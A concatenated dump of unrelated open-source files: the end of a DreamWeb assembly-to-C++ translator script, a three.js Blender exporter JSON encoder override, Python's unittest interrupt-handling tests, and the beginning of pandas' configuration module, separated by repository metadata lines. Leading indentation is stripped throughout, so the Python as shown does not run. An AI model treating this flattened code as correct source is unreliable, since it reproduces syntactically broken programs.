* of the License, or (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
*/
"""
self.fd = open(fname, "wt")
self.hd = open(header, "wt")
hid = "TASMRECOVER_%s_STUBS_H__" %namespace.upper()
self.hd.write("""#ifndef %s
#define %s
%s""" %(hid, hid, banner))
self.context = context
self.data_seg = context.binary_data
self.procs = context.proc_list
self.skip_first = skip_first
self.proc_queue = []
self.proc_done = []
self.blacklist = blacklist
self.failed = list(blacklist)
self.skip_output = skip_output
self.skip_dispatch_call = skip_dispatch_call
self.skip_addr_constants = skip_addr_constants
self.header_omit_blacklisted = header_omit_blacklisted
self.function_name_remapping = function_name_remapping
self.translated = []
self.proc_addr = []
self.used_data_offsets = set()
self.methods = []
self.fd.write("""%s
#include \"%s\"
namespace %s {
""" %(banner, header, namespace))
def expand_cb(self, match):
name = match.group(0).lower()
if len(name) == 2 and \
((name[0] in ['a', 'b', 'c', 'd'] and name[1] in ['h', 'x', 'l']) or name in ['si', 'di', 'es', 'ds', 'cs']):
return "%s" %name
if self.indirection == -1:
try:
offset,p,p = self.context.get_offset(name)
except:
pass
else:
print "OFFSET = %d" %offset
self.indirection = 0
self.used_data_offsets.add((name,offset))
return "offset_%s" % (name,)
g = self.context.get_global(name)
if isinstance(g, op.const):
value = self.expand_equ(g.value)
print "equ: %s -> %s" %(name, value)
elif isinstance(g, proc.proc):
if self.indirection != -1:
raise Exception("invalid proc label usage")
value = str(g.offset)
self.indirection = 0
else:
size = g.size
if size == 0:
raise Exception("invalid var '%s' size %u" %(name, size))
if self.indirection == 0:
value = "data.%s(k%s)" %("byte" if size == 1 else "word", name.capitalize())
elif self.indirection == -1:
value = "%s" %g.offset
self.indirection = 0
else:
raise Exception("invalid indirection %d" %self.indirection)
return value
def get_size(self, expr):
#print 'get_size("%s")' %expr
try:
v = self.context.parse_int(expr)
return 1 if v < 256 else 2
except:
pass
if re.match(r'byte\s+ptr\s', expr) is not None:
return 1
if re.match(r'word\s+ptr\s', expr) is not None:
return 2
if len(expr) == 2 and expr[0] in ['a', 'b', 'c', 'd'] and expr[1] in ['h', 'l']:
return 1
if expr in ['ax', 'bx', 'cx', 'dx', 'si', 'di', 'sp', 'bp', 'ds', 'cs', 'es', 'fs']:
return 2
m = re.match(r'[a-zA-Z_]\w*', expr)
if m is not None:
name = m.group(0)
try:
g = self.context.get_global(name)
return g.size
except:
pass
return 0
def expand_equ_cb(self, match):
name = match.group(0).lower()
g = self.context.get_global(name)
if isinstance(g, op.const):
return g.value
return str(g.offset)
def expand_equ(self, expr):
n = 1
while n > 0:
expr, n = re.subn(r'\b[a-zA-Z_][a-zA-Z0-9_]+\b', self.expand_equ_cb, expr)
expr = re.sub(r'\b([0-9][a-fA-F0-9]*)h', '0x\\1', expr)
return "(%s)" %expr
def expand(self, expr, def_size = 0):
#print "EXPAND \"%s\"" %expr
size = self.get_size(expr) if def_size == 0 else def_size
indirection = 0
seg = None
reg = True
m = re.match(r'seg\s+(.*?)$', expr)
if m is not None:
return "data"
match_id = True
m = re.match(r'offset\s+(.*?)$', expr)
if m is not None:
indirection -= 1
expr = m.group(1).strip()
m = re.match(r'byte\s+ptr\s+(.*?)$', expr)
if m is not None:
expr = m.group(1).strip()
m = re.match(r'word\s+ptr\s+(.*?)$', expr)
if m is not None:
expr = m.group(1).strip()
m = re.match(r'\[(.*)\]$', expr)
if m is not None:
indirection += 1
expr = m.group(1).strip()
m = re.match(r'(\w{2,2}):(.*)$', expr)
if m is not None:
seg_prefix = m.group(1)
expr = m.group(2).strip()
print "SEGMENT %s, remains: %s" %(seg_prefix, expr)
else:
seg_prefix = "ds"
m = re.match(r'(([abcd][xhl])|si|di|bp|sp)([\+-].*)?$', expr)
if m is not None:
reg = m.group(1)
plus = m.group(3)
if plus is not None:
plus = self.expand(plus)
else:
plus = ""
match_id = False
#print "COMMON_REG: ", reg, plus
expr = "%s%s" %(reg, plus)
expr = re.sub(r'\b([0-9][a-fA-F0-9]*)h', '0x\\1', expr)
expr = re.sub(r'\b([0-1]+)b', parse_bin, expr)
expr = re.sub(r'"(.)"', '\'\\1\'', expr)
if match_id:
#print "BEFORE: %d" %indirection
self.indirection = indirection
expr = re.sub(r'\b[a-zA-Z_][a-zA-Z0-9_]+\b', self.expand_cb, expr)
indirection = self.indirection
#print "AFTER: %d" %indirection
if indirection == 1:
if size == 1:
expr = "%s.byte(%s)" %(seg_prefix, expr)
elif size == 2:
expr = "%s.word(%s)" %(seg_prefix, expr)
else:
expr = "@invalid size 0"
elif indirection == 0:
pass
elif indirection == -1:
expr = "&%s" %expr
else:
raise Exception("invalid indirection %d" %indirection)
return expr
def mangle_label(self, name):
name = name.lower()
return re.sub(r'\$', '_tmp', name)
def resolve_label(self, name):
name = name.lower()
if not name in self.proc.labels:
try:
offset, proc, pos = self.context.get_offset(name)
except:
print "no label %s, trying procedure" %name
proc = self.context.get_global(name)
pos = 0
if not isinstance(proc, proc_module.proc):
raise CrossJump("cross-procedure jump to non label and non procedure %s" %(name))
self.proc.labels.add(name)
for i in xrange(0, len(self.unbounded)):
u = self.unbounded[i]
if u[1] == proc:
if pos < u[2]:
self.unbounded[i] = (name, proc, pos)
return self.mangle_label(name)
self.unbounded.append((name, proc, pos))
return self.mangle_label(name)
def jump_to_label(self, name):
jump_proc = False
if name in self.blacklist:
jump_proc = True
if self.context.has_global(name) :
g = self.context.get_global(name)
if isinstance(g, proc_module.proc):
jump_proc = True
if jump_proc:
if name in self.function_name_remapping:
return "{ %s(); return; }" %self.function_name_remapping[name]
else:
return "{ %s(); return; }" %name
else:
# TODO: name or self.resolve_label(name) or self.mangle_label(name)??
if name in self.proc.retlabels:
return "return /* (%s) */" % (name)
return "goto %s" %self.resolve_label(name)
def _label(self, name):
self.body += "%s:\n" %self.mangle_label(name)
def schedule(self, name):
name = name.lower()
if name in self.proc_queue or name in self.proc_done or name in self.failed:
return
print "+scheduling function %s..." %name
self.proc_queue.append(name)
def _call(self, name):
name = name.lower()
if name == 'ax':
self.body += "\t__dispatch_call(%s);\n" %self.expand('ax', 2)
return
if name in self.function_name_remapping:
self.body += "\t%s();\n" %self.function_name_remapping[name]
else:
self.body += "\t%s();\n" %name
self.schedule(name)
def _ret(self):
self.body += "\treturn;\n"
def parse2(self, dst, src):
dst_size, src_size = self.get_size(dst), self.get_size(src)
if dst_size == 0:
if src_size == 0:
raise Exception("both sizes are 0")
dst_size = src_size
if src_size == 0:
src_size = dst_size
dst = self.expand(dst, dst_size)
src = self.expand(src, src_size)
return dst, src
def _mov(self, dst, src):
self.body += "\t%s = %s;\n" %self.parse2(dst, src)
def _add(self, dst, src):
self.body += "\t_add(%s, %s);\n" %self.parse2(dst, src)
def _sub(self, dst, src):
self.body += "\t_sub(%s, %s);\n" %self.parse2(dst, src)
def _and(self, dst, src):
self.body += "\t_and(%s, %s);\n" %self.parse2(dst, src)
def _or(self, dst, src):
self.body += "\t_or(%s, %s);\n" %self.parse2(dst, src)
def _xor(self, dst, src):
self.body += "\t_xor(%s, %s);\n" %self.parse2(dst, src)
def _neg(self, dst):
dst = self.expand(dst)
self.body += "\t_neg(%s);\n" %(dst)
def _cbw(self):
self.body += "\tax.cbw();\n"
def _shr(self, dst, src):
self.body += "\t_shr(%s, %s);\n" %self.parse2(dst, src)
def _shl(self, dst, src):
self.body += "\t_shl(%s, %s);\n" %self.parse2(dst, src)
#def _sar(self, dst, src):
# self.body += "\t_sar(%s%s);\n" %self.parse2(dst, src)
#def _sal(self, dst, src):
# self.body += "\t_sal(%s, %s);\n" %self.parse2(dst, src)
#def _rcl(self, dst, src):
# self.body += "\t_rcl(%s, %s);\n" %self.parse2(dst, src)
#def _rcr(self, dst, src):
# self.body += "\t_rcr(%s, %s);\n" %self.parse2(dst, src)
def _mul(self, src):
src = self.expand(src)
self.body += "\t_mul(%s);\n" %(src)
def _div(self, src):
src = self.expand(src)
self.body += "\t_div(%s);\n" %(src)
def _inc(self, dst):
dst = self.expand(dst)
self.body += "\t_inc(%s);\n" %(dst)
def _dec(self, dst):
dst = self.expand(dst)
self.body += "\t_dec(%s);\n" %(dst)
def _cmp(self, a, b):
self.body += "\t_cmp(%s, %s);\n" %self.parse2(a, b)
def _test(self, a, b):
self.body += "\t_test(%s, %s);\n" %self.parse2(a, b)
def _js(self, label):
self.body += "\tif (flags.s())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jns(self, label):
self.body += "\tif (!flags.s())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jz(self, label):
self.body += "\tif (flags.z())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jnz(self, label):
self.body += "\tif (!flags.z())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jl(self, label):
self.body += "\tif (flags.l())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jg(self, label):
self.body += "\tif (!flags.le())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jle(self, label):
self.body += "\tif (flags.le())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jge(self, label):
self.body += "\tif (!flags.l())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jc(self, label):
self.body += "\tif (flags.c())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jnc(self, label):
self.body += "\tif (!flags.c())\n\t\t%s;\n" %(self.jump_to_label(label))
def _xchg(self, dst, src):
self.body += "\t_xchg(%s, %s);\n" %self.parse2(dst, src)
def _jmp(self, label):
self.body += "\t%s;\n" %(self.jump_to_label(label))
def _loop(self, label):
self.body += "\tif (--cx)\n\t\t%s;\n" %self.jump_to_label(label)
def _push(self, regs):
p = str();
for r in regs:
r = self.expand(r)
p += "\tpush(%s);\n" %(r)
self.body += p
def _pop(self, regs):
p = str();
for r in regs:
self.temps_count -= 1
i = self.temps_count
r = self.expand(r)
p += "\t%s = pop();\n" %r
self.body += p
def _rep(self):
self.body += "\twhile(cx--)\n\t"
def _lodsb(self):
self.body += "\t_lodsb();\n"
def _lodsw(self):
self.body += "\t_lodsw();\n"
def _stosb(self, n, clear_cx):
self.body += "\t_stosb(%s%s);\n" %("" if n == 1 else n, ", true" if clear_cx else "")
def _stosw(self, n, clear_cx):
self.body += "\t_stosw(%s%s);\n" %("" if n == 1 else n, ", true" if clear_cx else "")
def _movsb(self, n, clear_cx):
self.body += "\t_movsb(%s%s);\n" %("" if n == 1 else n, ", true" if clear_cx else "")
def _movsw(self, n, clear_cx):
self.body += "\t_movsw(%s%s);\n" %("" if n == 1 else n, ", true" if clear_cx else "")
def _stc(self):
self.body += "\tflags._c = true;\n "
def _clc(self):
self.body += "\tflags._c = false;\n "
def __proc(self, name, def_skip = 0):
try:
skip = def_skip
self.temps_count = 0
self.temps_max = 0
if self.context.has_global(name):
self.proc = self.context.get_global(name)
else:
print "No procedure named %s, trying label" %name
off, src_proc, skip = self.context.get_offset(name)
self.proc = proc_module.proc(name)
self.proc.stmts = copy(src_proc.stmts)
self.proc.labels = copy(src_proc.labels)
self.proc.retlabels = copy(src_proc.retlabels)
#for p in xrange(skip, len(self.proc.stmts)):
# s = self.proc.stmts[p]
# if isinstance(s, op.basejmp):
# o, p, s = self.context.get_offset(s.label)
# if p == src_proc and s < skip:
# skip = s
self.proc_addr.append((name, self.proc.offset))
self.body = str()
if name in self.function_name_remapping:
self.body += "void %sContext::%s() {\n\tSTACK_CHECK;\n" %(self.namespace, self.function_name_remapping[name]);
else:
self.body += "void %sContext::%s() {\n\tSTACK_CHECK;\n" %(self.namespace, name);
self.proc.optimize()
self.unbounded = []
self.proc.visit(self, skip)
#adding remaining labels:
for i in xrange(0, len(self.unbounded)):
u = self.unbounded[i]
print "UNBOUNDED: ", u
proc = u[1]
for p in xrange(u[2], len(proc.stmts)):
s = proc.stmts[p]
if isinstance(s, op.basejmp):
self.resolve_label(s.label)
#adding statements
#BIG FIXME: this is quite ugly to handle code analysis from the code generation. rewrite me!
for label, proc, offset in self.unbounded:
self.body += "\treturn;\n" #we need to return before calling code from the other proc
self.body += "/*continuing to unbounded code: %s from %s:%d-%d*/\n" %(label, proc.name, offset, len(proc.stmts))
start = len(self.proc.stmts)
self.proc.add_label(label)
for s in proc.stmts[offset:]:
if isinstance(s, op.label):
self.proc.labels.add(s.name)
self.proc.stmts.append(s)
self.proc.add("ret")
print "skipping %d instructions, todo: %d" %(start, len(self.proc.stmts) - start)
print "re-optimizing..."
self.proc.optimize(keep_labels=[label])
self.proc.visit(self, start)
self.body += "}\n";
if name not in self.skip_output:
self.translated.insert(0, self.body)
self.proc = None
if self.temps_count > 0:
raise Exception("temps count == %d at the exit of proc" %self.temps_count);
return True
except (CrossJump, op.Unsupported) as e:
print "%s: ERROR: %s" %(name, e)
self.failed.append(name)
except:
raise
def get_type(self, width):
return "uint%d_t" %(width * 8)
def write_stubs(self, fname, procs):
fd = open(fname, "wt")
fd.write("namespace %s {\n" %self.namespace)
for p in procs:
if p in self.function_name_remapping:
fd.write("void %sContext::%s() {\n\t::error(\"%s\");\n}\n\n" %(self.namespace, self.function_name_remapping[p], self.function_name_remapping[p]))
else:
fd.write("void %sContext::%s() {\n\t::error(\"%s\");\n}\n\n" %(self.namespace, p, p))
fd.write("} // End of namespace %s\n" %self.namespace)
fd.close()
def generate(self, start):
#print self.prologue()
#print context
self.proc_queue.append(start)
while len(self.proc_queue):
name = self.proc_queue.pop()
if name in self.failed or name in self.proc_done:
continue
if len(self.proc_queue) == 0 and len(self.procs) > 0:
print "queue's empty, adding remaining procs:"
for p in self.procs:
self.schedule(p)
self.procs = []
print "continuing on %s" %name
self.proc_done.append(name)
self.__proc(name)
self.methods.append(name)
self.write_stubs("_stubs.cpp", self.failed)
self.methods += self.failed
done, failed = len(self.proc_done), len(self.failed)
self.fd.write("\n")
self.fd.write("\n".join(self.translated))
self.fd.write("\n")
print "%d ok, %d failed of %d, %.02g%% translated" %(done, failed, done + failed, 100.0 * done / (done + failed))
print "\n".join(self.failed)
data_bin = self.data_seg
data_impl = "\n\tstatic const uint8 src[] = {\n\t\t"
n = 0
comment = str()
for v in data_bin:
data_impl += "0x%02x, " %v
n += 1
comment += chr(v) if (v >= 0x20 and v < 0x7f and v != ord('\\')) else "."
if (n & 0xf) == 0:
data_impl += "\n\t\t//0x%04x: %s\n\t\t" %(n - 16, comment)
comment = str()
elif (n & 0x3) == 0:
comment += " "
data_impl += "};\n\tds.assign(src, src + sizeof(src));\n"
self.hd.write(
"""\n#include "dreamweb/runtime.h"
#include "dreamweb/structs.h"
#include "dreamweb/dreambase.h"
namespace %s {
"""
%(self.namespace))
if self.skip_addr_constants == False:
for name,addr in self.proc_addr:
self.hd.write("static const uint16 addr_%s = 0x%04x;\n" %(name, addr))
for name,addr in self.used_data_offsets:
self.hd.write("static const uint16 offset_%s = 0x%04x;\n" %(name, addr))
offsets = []
for k, v in self.context.get_globals().items():
if isinstance(v, op.var):
offsets.append((k.capitalize(), v.offset))
elif isinstance(v, op.const):
offsets.append((k.capitalize(), self.expand_equ(v.value))) #fixme: try to save all constants here
offsets = sorted(offsets, key=lambda t: t[1])
for o in offsets:
self.hd.write("static const uint16 k%s = %s;\n" %o)
self.hd.write("\n")
self.hd.write(
"""
class %sContext : public DreamBase, public Context {
public:
DreamGenContext(DreamWeb::DreamWebEngine *en) : DreamBase(en), Context(this) {}
void __start();
"""
%(self.namespace))
if self.skip_dispatch_call == False:
self.hd.write(
""" void __dispatch_call(uint16 addr);
""")
for p in set(self.methods):
if p in self.blacklist:
if self.header_omit_blacklisted == False:
self.hd.write("\t//void %s();\n" %p)
else:
if p in self.function_name_remapping:
self.hd.write("\tvoid %s();\n" %self.function_name_remapping[p])
else:
self.hd.write("\tvoid %s();\n" %p)
self.hd.write("};\n\n} // End of namespace DreamGen\n\n#endif\n")
self.hd.close()
self.fd.write("void %sContext::__start() { %s\t%s(); \n}\n" %(self.namespace, data_impl, start))
if self.skip_dispatch_call == False:
self.fd.write("\nvoid %sContext::__dispatch_call(uint16 addr) {\n\tswitch(addr) {\n" %self.namespace)
self.proc_addr.sort(cmp = lambda x, y: x[1] - y[1])
for name,addr in self.proc_addr:
self.fd.write("\t\tcase addr_%s: %s(); break;\n" %(name, name))
self.fd.write("\t\tdefault: ::error(\"invalid call to %04x dispatched\", (uint16)ax);")
self.fd.write("\n\t}\n}")
self.fd.write("\n} // End of namespace DreamGen\n")
self.fd.close()
| gpl-2.0 |
sufeiou/three.js | utils/exporters/blender/addons/io_three/exporter/_json.py | 296 | 6976 | import json
from .. import constants
ROUND = constants.DEFAULT_PRECISION
## THREE override function
def _json_floatstr(o):
if ROUND is not None:
o = round(o, ROUND)
return '%g' % o
def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
_key_separator, _item_separator, _sort_keys, _skipkeys, _one_shot,
## HACK: hand-optimized bytecode; turn globals into locals
ValueError=ValueError,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
str=str,
tuple=tuple,
):
'''
Overwrite json.encoder for Python 2.7 and above to not
assign each index of a list or tuple to its own row as
this is completely asinine behaviour
'''
## @THREE
# Override the function
_floatstr = _json_floatstr
if _indent is not None and not isinstance(_indent, str):
_indent = ' ' * _indent
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
## @THREEJS
# - block the moronic functionality that puts each
# index on its own line causing insane row counts
#if _indent is not None:
# _current_indent_level += 1
# newline_indent = '\n' + _indent * _current_indent_level
# separator = _item_separator + newline_indent
# buf += newline_indent
#else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, str):
yield buf + _encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, int):
yield buf + str(value)
elif isinstance(value, float):
yield buf + _floatstr(value)
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + _indent * _current_indent_level
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + _indent * _current_indent_level
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0])
else:
items = dct.items()
for key, value in items:
if isinstance(key, str):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = _floatstr(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, int):
key = str(key)
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, str):
yield _encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, int):
yield str(value)
elif isinstance(value, float):
yield _floatstr(value)
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + _indent * _current_indent_level
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, str):
yield _encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, int):
yield str(o)
elif isinstance(o, float):
yield _floatstr(o)
elif isinstance(o, (list, tuple)):
for chunk in _iterencode_list(o, _current_indent_level):
yield chunk
elif isinstance(o, dict):
for chunk in _iterencode_dict(o, _current_indent_level):
yield chunk
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
for chunk in _iterencode(o, _current_indent_level):
yield chunk
if markers is not None:
del markers[markerid]
return _iterencode
# override the encoder
json.encoder._make_iterencode = _make_iterencode
| mit |
40223225/2015-cdb-g3-test2- | static/Brython3.1.1-20150328-091302/Lib/unittest/test/test_break.py | 785 | 8138 | import gc
import io
import os
import sys
import signal
import weakref
import unittest
@unittest.skipUnless(hasattr(os, 'kill'), "Test requires os.kill")
@unittest.skipIf(sys.platform =="win32", "Test cannot run on Windows")
@unittest.skipIf(sys.platform == 'freebsd6', "Test kills regrtest on freebsd6 "
"if threads have been used")
class TestBreak(unittest.TestCase):
def setUp(self):
self._default_handler = signal.getsignal(signal.SIGINT)
def tearDown(self):
signal.signal(signal.SIGINT, self._default_handler)
unittest.signals._results = weakref.WeakKeyDictionary()
unittest.signals._interrupt_handler = None
def testInstallHandler(self):
default_handler = signal.getsignal(signal.SIGINT)
unittest.installHandler()
self.assertNotEqual(signal.getsignal(signal.SIGINT), default_handler)
try:
pid = os.getpid()
os.kill(pid, signal.SIGINT)
except KeyboardInterrupt:
self.fail("KeyboardInterrupt not handled")
self.assertTrue(unittest.signals._interrupt_handler.called)
def testRegisterResult(self):
result = unittest.TestResult()
unittest.registerResult(result)
for ref in unittest.signals._results:
if ref is result:
break
elif ref is not result:
self.fail("odd object in result set")
else:
self.fail("result not found")
def testInterruptCaught(self):
default_handler = signal.getsignal(signal.SIGINT)
result = unittest.TestResult()
unittest.installHandler()
unittest.registerResult(result)
self.assertNotEqual(signal.getsignal(signal.SIGINT), default_handler)
def test(result):
pid = os.getpid()
os.kill(pid, signal.SIGINT)
result.breakCaught = True
self.assertTrue(result.shouldStop)
try:
test(result)
except KeyboardInterrupt:
self.fail("KeyboardInterrupt not handled")
self.assertTrue(result.breakCaught)
def testSecondInterrupt(self):
result = unittest.TestResult()
unittest.installHandler()
unittest.registerResult(result)
def test(result):
pid = os.getpid()
os.kill(pid, signal.SIGINT)
result.breakCaught = True
self.assertTrue(result.shouldStop)
os.kill(pid, signal.SIGINT)
self.fail("Second KeyboardInterrupt not raised")
try:
test(result)
except KeyboardInterrupt:
pass
else:
self.fail("Second KeyboardInterrupt not raised")
self.assertTrue(result.breakCaught)
def testTwoResults(self):
unittest.installHandler()
result = unittest.TestResult()
unittest.registerResult(result)
new_handler = signal.getsignal(signal.SIGINT)
result2 = unittest.TestResult()
unittest.registerResult(result2)
self.assertEqual(signal.getsignal(signal.SIGINT), new_handler)
result3 = unittest.TestResult()
def test(result):
pid = os.getpid()
os.kill(pid, signal.SIGINT)
try:
test(result)
except KeyboardInterrupt:
self.fail("KeyboardInterrupt not handled")
self.assertTrue(result.shouldStop)
self.assertTrue(result2.shouldStop)
self.assertFalse(result3.shouldStop)
def testHandlerReplacedButCalled(self):
# If our handler has been replaced (is no longer installed) but is
# called by the *new* handler, then it isn't safe to delay the
# SIGINT and we should immediately delegate to the default handler
unittest.installHandler()
handler = signal.getsignal(signal.SIGINT)
def new_handler(frame, signum):
handler(frame, signum)
signal.signal(signal.SIGINT, new_handler)
try:
pid = os.getpid()
os.kill(pid, signal.SIGINT)
except KeyboardInterrupt:
pass
else:
self.fail("replaced but delegated handler doesn't raise interrupt")
def testRunner(self):
# Creating a TextTestRunner with the appropriate argument should
# register the TextTestResult it creates
runner = unittest.TextTestRunner(stream=io.StringIO())
result = runner.run(unittest.TestSuite())
self.assertIn(result, unittest.signals._results)
def testWeakReferences(self):
# Calling registerResult on a result should not keep it alive
result = unittest.TestResult()
unittest.registerResult(result)
ref = weakref.ref(result)
del result
# For non-reference counting implementations
gc.collect();gc.collect()
self.assertIsNone(ref())
def testRemoveResult(self):
result = unittest.TestResult()
unittest.registerResult(result)
unittest.installHandler()
self.assertTrue(unittest.removeResult(result))
# Should this raise an error instead?
self.assertFalse(unittest.removeResult(unittest.TestResult()))
try:
pid = os.getpid()
os.kill(pid, signal.SIGINT)
except KeyboardInterrupt:
pass
self.assertFalse(result.shouldStop)
def testMainInstallsHandler(self):
failfast = object()
test = object()
verbosity = object()
result = object()
default_handler = signal.getsignal(signal.SIGINT)
class FakeRunner(object):
initArgs = []
runArgs = []
def __init__(self, *args, **kwargs):
self.initArgs.append((args, kwargs))
def run(self, test):
self.runArgs.append(test)
return result
class Program(unittest.TestProgram):
def __init__(self, catchbreak):
self.exit = False
self.verbosity = verbosity
self.failfast = failfast
self.catchbreak = catchbreak
self.testRunner = FakeRunner
self.test = test
self.result = None
p = Program(False)
p.runTests()
self.assertEqual(FakeRunner.initArgs, [((), {'buffer': None,
'verbosity': verbosity,
'failfast': failfast,
'warnings': None})])
self.assertEqual(FakeRunner.runArgs, [test])
self.assertEqual(p.result, result)
self.assertEqual(signal.getsignal(signal.SIGINT), default_handler)
FakeRunner.initArgs = []
FakeRunner.runArgs = []
p = Program(True)
p.runTests()
self.assertEqual(FakeRunner.initArgs, [((), {'buffer': None,
'verbosity': verbosity,
'failfast': failfast,
'warnings': None})])
self.assertEqual(FakeRunner.runArgs, [test])
self.assertEqual(p.result, result)
self.assertNotEqual(signal.getsignal(signal.SIGINT), default_handler)
def testRemoveHandler(self):
default_handler = signal.getsignal(signal.SIGINT)
unittest.installHandler()
unittest.removeHandler()
self.assertEqual(signal.getsignal(signal.SIGINT), default_handler)
# check that calling removeHandler multiple times has no ill-effect
unittest.removeHandler()
self.assertEqual(signal.getsignal(signal.SIGINT), default_handler)
def testRemoveHandlerAsDecorator(self):
default_handler = signal.getsignal(signal.SIGINT)
unittest.installHandler()
@unittest.removeHandler
def test():
self.assertEqual(signal.getsignal(signal.SIGINT), default_handler)
test()
self.assertNotEqual(signal.getsignal(signal.SIGINT), default_handler)
| gpl-3.0 |
NixaSoftware/CVis | venv/lib/python2.7/site-packages/pandas/core/config.py | 3 | 23248 | """
The config module holds package-wide configurables and provides
a uniform API for working with them.
Overview
========
This module supports the following requirements:
- options are referenced using keys in dot.notation, e.g. "x.y.option - z".
- keys are case-insensitive.
- functions should accept partial/regex keys, when unambiguous.
- options can be registered by modules at import time.
- options can be registered at init-time (via core.config_init)
- options have a default value, and (optionally) a description and
validation function associated with them.
- options can be deprecated, in which case referencing them
should produce a warning.
- deprecated options can optionally be rerouted to a replacement
so that accessing a deprecated option reroutes to a differently
named option.
- options can be reset to their default value.
- all option can be reset to their default value at once.
- all options in a certain sub - namespace can be reset at once.
- the user can set / get / reset or ask for the description of an option.
- a developer can register and mark an option as deprecated.
- you can register a callback to be invoked when the the option value
is set or reset. Changing the stored value is considered misuse, but
is not verboten.
Implementation
==============
- Data is stored using nested dictionaries, and should be accessed
through the provided API.
- "Registered options" and "Deprecated options" have metadata associcated
with them, which are stored in auxilary dictionaries keyed on the
fully-qualified key, e.g. "x.y.z.option".
- the config_init module is imported by the package's __init__.py file.
placing any register_option() calls there will ensure those options
are available as soon as pandas is loaded. If you use register_option
in a module, it will only be available after that module is imported,
which you should be aware of.
- `config_prefix` is a context_manager (for use with the `with` keyword)
which can save developers some typing, see the docstring.
"""
import re
from collections import namedtuple
from contextlib import contextmanager
import warnings
from pandas.compat import map, lmap, u
import pandas.compat as compat
DeprecatedOption = namedtuple('DeprecatedOption', 'key msg rkey removal_ver')
RegisteredOption = namedtuple('RegisteredOption',
'key defval doc validator cb')
_deprecated_options = {} # holds deprecated option metdata
_registered_options = {} # holds registered option metdata
_global_config = {} # holds the current values for registered options
_reserved_keys = ['all'] # keys which have a special meaning
class OptionError(AttributeError, KeyError):
"""Exception for pandas.options, backwards compatible with KeyError
checks
"""
#
# User API
def _get_single_key(pat, silent):
keys = _select_options(pat)
if len(keys) == 0:
if not silent:
_warn_if_deprecated(pat)
raise OptionError('No such keys(s): {pat!r}'.format(pat=pat))
if len(keys) > 1:
raise OptionError('Pattern matched multiple keys')
key = keys[0]
if not silent:
_warn_if_deprecated(key)
key = _translate_key(key)
return key
def _get_option(pat, silent=False):
key = _get_single_key(pat, silent)
# walk the nested dict
root, k = _get_root(key)
return root[k]
def _set_option(*args, **kwargs):
# must at least 1 arg deal with constraints later
nargs = len(args)
if not nargs or nargs % 2 != 0:
raise ValueError("Must provide an even number of non-keyword "
"arguments")
# default to false
silent = kwargs.pop('silent', False)
if kwargs:
msg = '_set_option() got an unexpected keyword argument "{kwarg}"'
raise TypeError(msg.format(list(kwargs.keys())[0]))
for k, v in zip(args[::2], args[1::2]):
key = _get_single_key(k, silent)
o = _get_registered_option(key)
if o and o.validator:
o.validator(v)
# walk the nested dict
root, k = _get_root(key)
root[k] = v
if o.cb:
if silent:
with warnings.catch_warnings(record=True):
o.cb(key)
else:
o.cb(key)
def _describe_option(pat='', _print_desc=True):
keys = _select_options(pat)
if len(keys) == 0:
raise OptionError('No such keys(s)')
s = u('')
for k in keys: # filter by pat
s += _build_option_description(k)
if _print_desc:
print(s)
else:
return s
def _reset_option(pat, silent=False):
keys = _select_options(pat)
if len(keys) == 0:
raise OptionError('No such keys(s)')
if len(keys) > 1 and len(pat) < 4 and pat != 'all':
raise ValueError('You must specify at least 4 characters when '
'resetting multiple keys, use the special keyword '
'"all" to reset all the options to their default '
'value')
for k in keys:
